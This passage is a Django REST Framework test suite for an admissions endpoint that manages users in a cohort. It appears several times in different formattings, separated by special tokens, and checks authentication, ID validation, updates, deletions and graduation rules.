'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 999})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid user_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 9999})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 9999, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
"""Test /cohort/:id/user/:id"""
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 999})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid user_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 9999})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 9999, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import re
from unittest.mock import patch
from django.urls.base import reverse_lazy
from rest_framework import status
from breathecode.tests.mocks import GOOGLE_CLOUD_PATH, apply_google_cloud_client_mock, apply_google_cloud_bucket_mock, apply_google_cloud_blob_mock
from ..mixins import AdmissionsTestCase
class CohortIdUserIdTestSuite(AdmissionsTestCase):
"""Test /cohort/:id/user/:id"""
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 999})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid user_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 9999})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 9999, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
"""
Test /cohort/:id/user/:id
"""
import re
from unittest.mock import patch
from django.urls.base import reverse_lazy
from rest_framework import status
from breathecode.tests.mocks import (
GOOGLE_CLOUD_PATH,
apply_google_cloud_client_mock,
apply_google_cloud_bucket_mock,
apply_google_cloud_blob_mock,
)
from ..mixins import AdmissionsTestCase
class CohortIdUserIdTestSuite(AdmissionsTestCase):
"""Test /cohort/:id/user/:id"""
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(
json, {
'detail': 'Authentication credentials were not provided.',
'status_code': status.HTTP_401_UNAUTHORIZED
})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': 999
})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid user_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
self.assertEqual(json, expected)
